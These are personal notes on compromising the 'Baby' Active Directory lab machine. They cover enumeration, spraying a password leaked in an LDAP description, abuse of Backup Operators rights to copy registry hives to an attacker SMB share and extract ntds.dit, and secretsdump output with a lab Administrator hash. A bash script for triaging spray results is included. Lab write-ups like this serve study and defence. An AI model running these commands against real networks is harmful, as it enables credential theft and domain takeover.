Baby
This is not a writeup, just my notes about the machine.
Machine information

Operating System: Windows Server 2022 (Build 20348 x64)
Chain: False (standalone compromise)
Credentials
| Username | Password | Method | Scope |
| --- | --- | --- | --- |
| Caroline.Robinson | BabyStart123! | LDAP | User description field (Expired Password) |
✅ Valid Usernames
jacqueline.barnett
ashley.webb
hugh.george
leonard.dyer
ian.walker
connor.wilkinson
joseph.hughes
kerry.wilson
teresa.bell
caroline.robinson
🔑 Passwords list
BabyStart123!
Enumeration
ICMP Check
ping -c 4 10.10.90.157
PING 10.10.90.157 (10.10.90.157) 56(84) bytes of data.
64 bytes from 10.10.90.157: icmp_seq=1 ttl=127 time=160 ms
64 bytes from 10.10.90.157: icmp_seq=2 ttl=127 time=164 ms
64 bytes from 10.10.90.157: icmp_seq=3 ttl=127 time=159 ms
64 bytes from 10.10.90.157: icmp_seq=4 ttl=127 time=159 ms
--- 10.10.90.157 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3007ms
rtt min/avg/max/mdev = 158.699/160.582/164.422/2.250 ms
TTL 127 is consistent with a Windows host (default TTL 128) one router hop away.
Service enumeration
nmap -p- -A --open -T5 -Pn -n -oN ext_baby_tcp_allports -vvv 10.10.90.157
53/tcp open domain syn-ack Simple DNS Plus
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2025-04-01 00:34:34Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack
3389/tcp open ms-wbt-server syn-ack Microsoft Terminal Services
5357/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf syn-ack .NET Message Framing
49664/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49669/tcp open msrpc syn-ack Microsoft Windows RPC
49674/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc syn-ack Microsoft Windows RPC
53720/tcp open msrpc syn-ack Microsoft Windows RPC
53735/tcp open msrpc syn-ack Microsoft Windows RPC
SMB
Null session allowed ✅
SMB Signing: True
SMBv1: Disabled
Initial Foothold
Identifying Leaked Initial Passwords in the User Description Field
❯ nxc ldap baby.vl -u '' -p '' --users
LDAP 10.10.125.49 389 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
LDAP 10.10.125.49 389 BABYDC [+] baby.vl\:
LDAP 10.10.125.49 389 BABYDC [*] Enumerated 9 domain users: baby.vl
LDAP 10.10.125.49 389 BABYDC -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.10.125.49 389 BABYDC Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.10.125.49 389 BABYDC Jacqueline.Barnett 2021-11-21 10:11:03 0
LDAP 10.10.125.49 389 BABYDC Ashley.Webb 2021-11-21 10:11:03 0
LDAP 10.10.125.49 389 BABYDC Hugh.George 2021-11-21 10:11:03 0
LDAP 10.10.125.49 389 BABYDC Leonard.Dyer 2021-11-21 10:11:03 0
LDAP 10.10.125.49 389 BABYDC Connor.Wilkinson 2021-11-21 10:11:08 0
LDAP 10.10.125.49 389 BABYDC Joseph.Hughes 2021-11-21 10:11:08 0
LDAP 10.10.125.49 389 BABYDC Kerry.Wilson 2021-11-21 10:11:08 0
LDAP 10.10.125.49 389 BABYDC Teresa.Bell 2021-11-21 10:14:37 6 Set initial password to BabyStart123!
Teresa.Bell's description field leaks the initial password set for the users: BabyStart123!
Running a Password Spraying attack
Spraying the leaked initial password over the valid usernames (the file users holds them, one per line):
❯ nxc smb 10.10.90.157 -u users -p 'BabyStart123!'
SMB 10.10.90.157 445 BABYDC [-] baby.vl\caroline.robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
STATUS_PASSWORD_MUST_CHANGE is printed with the same [-] marker as a wrong password, but it means the password is correct and has merely expired: the account is usable as soon as the password is changed.
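The two steps above (pulling leaked passwords out of the LDAP user dump, then spraying the recovered password and reading the NT status codes) as an added shell example that is not part of the original notes. It assumes the nxc output layout shown above; every sample line in it is constructed for the example, and the user names locked.example and valid.example are placeholders, not accounts from the lab.

```bash
#!/usr/bin/env bash
# Added example, not part of the original notes: post-process NetExec (nxc)
# output so that a password leaked in an LDAP description field and an
# "expired but correct" spray hit are not overlooked. Every sample line below
# is constructed for the example; only the layout follows the nxc output above.

# Constructed `nxc ldap baby.vl -u '' -p '' --users` output.
LDAP_OUT='LDAP 10.10.125.49 389 BABYDC [*] Enumerated 4 domain users: baby.vl
LDAP 10.10.125.49 389 BABYDC -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.10.125.49 389 BABYDC Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.10.125.49 389 BABYDC Jacqueline.Barnett 2021-11-21 10:11:03 0
LDAP 10.10.125.49 389 BABYDC Connor.Wilkinson 2021-11-21 10:11:08 0
LDAP 10.10.125.49 389 BABYDC Teresa.Bell 2021-11-21 10:14:37 6 Set initial password to BabyStart123!'

# Lowercased usernames, one per line: the `users` file for the spray.
# Status and header rows have "[" or "-" in column 5; Guest is skipped.
ldap_users() {
    printf '%s\n' "$1" | awk '$5 !~ /^(\[|-)/ && $5 != "Guest" { print tolower($5) }'
}

# Description fields that mention a password. "Last PW Set" is two fields for a
# date ("2021-11-21 10:14:37") but one field for "<never>", so the column where
# the description starts depends on the row.
ldap_leaked_passwords() {
    printf '%s\n' "$1" | awk '
        $5 !~ /^(\[|-)/ {
            start = ($6 == "<never>") ? 8 : 9
            desc = ""
            for (i = start; i <= NF; i++) desc = desc (i > start ? " " : "") $i
            if (tolower(desc) ~ /passw|pwd/) print tolower($5) ": " desc
        }'
}

# Constructed `nxc smb 10.10.90.157 -u users -p BabyStart123!` output
# (locked.example and valid.example are placeholder names).
SPRAY_OUT='SMB 10.10.90.157 445 BABYDC [-] baby.vl\jacqueline.barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.10.90.157 445 BABYDC [-] baby.vl\caroline.robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
SMB 10.10.90.157 445 BABYDC [-] baby.vl\locked.example:BabyStart123! STATUS_ACCOUNT_LOCKED_OUT
SMB 10.10.90.157 445 BABYDC [+] baby.vl\valid.example:BabyStart123!'

# One "CLASS user" line per result. nxc prints STATUS_PASSWORD_MUST_CHANGE with
# the same [-] marker as a wrong password, but it means the password is right
# and only has to be changed (impacket-changepasswd) before it can be used.
# STATUS_ACCOUNT_LOCKED_OUT means the spray has to stop.
spray_triage() {
    printf '%s\n' "$1" | awk '
        $5 == "[+]" || $5 == "[-]" {
            cred = $6
            sub(/^[^\\]*\\/, "", cred)      # drop the domain prefix
            sub(/:.*$/, "", cred)           # drop the :password suffix
            status = ($5 == "[+]") ? "VALID" : $7
            if (status == "STATUS_PASSWORD_MUST_CHANGE") status = "VALID_EXPIRED"
            else if (status == "STATUS_ACCOUNT_LOCKED_OUT") status = "LOCKED"
            else if (status == "STATUS_LOGON_FAILURE") status = "BAD"
            print status " " cred
        }'
}

# Accounts to follow up on: usable as-is, or usable after a password change.
spray_hits() {
    spray_triage "$1" | awk '$1 == "VALID" || $1 == "VALID_EXPIRED" { print $2 }'
}

# Stand-alone run: print the user list, the leaked password, and the triage.
ldap_users "$LDAP_OUT"
ldap_leaked_passwords "$LDAP_OUT"
spray_triage "$SPRAY_OUT"
```

In practice the output of `nxc ldap ... --users` and of the spray is piped into these functions instead of the constructed strings; `spray_hits` then lists exactly the accounts that deserve a follow-up, including the expired one that a quick scan for `[+]` would miss.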
Changing caroline.robinson's expired password
❯ impacket-changepasswd baby.vl/caroline.robinson:'BabyStart123!'@10.10.90.157
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
New password:
Retype new password:
[*] Changing the password of baby.vl\caroline.robinson
[*] Connecting to DCE/RPC as baby.vl\caroline.robinson
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
Compromise Domain Controller
Discovering Caroline.Robinson is a member of the Backup Operators group
*Evil-WinRM* PS C:\Users\Caroline.Robinson\Documents> whoami /all
User Info
Username: baby\caroline.robinson
Group Membership: Backup Operators
Privileges: SeBackupPrivilege, SeRestorePrivilege, SeMachineAccountPrivilege
SeBackupPrivilege is the one that matters here: a process holding it can read any file or registry hive in backup mode regardless of its ACL, which on a domain controller includes the SYSTEM hive and ntds.dit.
Extracting the registry hives with impacket-reg (-o takes a UNC path to a share we host on the attacking machine, e.g. with impacket-smbserver; SYSTEM is the hive secretsdump needs to decrypt ntds.dit, SAM and SECURITY only add the local accounts and LSA secrets)
impacket-reg caroline.robinson:'password123!'@10.10.75.110 save -keyName 'HKLM\SYSTEM' -o '\\10.8.5.48\smbfolder' 2>/dev/null
impacket-reg caroline.robinson:'password123!'@10.10.75.110 save -keyName 'HKLM\SAM' -o '\\10.8.5.48\smbfolder' 2>/dev/null
impacket-reg caroline.robinson:'password123!'@10.10.75.110 save -keyName 'HKLM\Security' -o '\\10.8.5.48\smbfolder' 2>/dev/null
Creating a shadow copy with diskshadow and copying ntds.dit out of it with robocopy /B
diskshadow script (run on the DC as diskshadow /s <scriptfile>; it snapshots C: and exposes the snapshot as W:):
set context persistent nowriters
set metadata c:\windows\system32\spool\drivers\color\example.cab
set verbose on
begin backup
add volume c: alias mydrive
create
expose %mydrive% w:
end backup
robocopy takes source directory, destination directory and file name; /B is backup mode, which is what turns SeBackupPrivilege into read access to a file Backup Operators are otherwise denied (a destination of C:\temp\ntds.dit would create a directory of that name and put the file inside it):
C:\temp> robocopy /B W:\Windows\NTDS C:\temp ntds.dit
Extracting domain credentials
❯ impacket-secretsdump -sam SAM.save -ntds ntds.dit -system SYSTEM.save local
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 41d56bf9b458d01951f592ee4ba00ea6
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ee4457ae59f1e3fbd764e33d9cef123d:::
<SNIP>
[*] Cleaning up...